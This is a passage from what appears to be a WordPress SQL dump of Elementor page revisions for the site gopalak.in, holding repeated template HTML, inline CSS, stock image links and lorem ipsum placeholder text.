src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:46:41','2022-09-21 07:16:41','',1373,'https://gopalak.in/?p=1397',0,'revision','',0),(1398,1,'2022-09-21 12:47:51','2022-09-21 07:17:51','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:47:51','2022-09-21 07:17:51','',1373,'https://gopalak.in/?p=1398',0,'revision','',0),(1399,1,'2022-09-21 12:47:51','2022-09-21 07:17:51','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:47:51','2022-09-21 07:17:51','',1373,'https://gopalak.in/?p=1399',0,'revision','',0),(1400,1,'2022-09-21 12:47:52','2022-09-21 07:17:52','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:47:52','2022-09-21 07:17:52','',1373,'https://gopalak.in/?p=1400',0,'revision','',0),(1402,1,'2022-09-21 12:49:38','2022-09-21 07:19:38','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 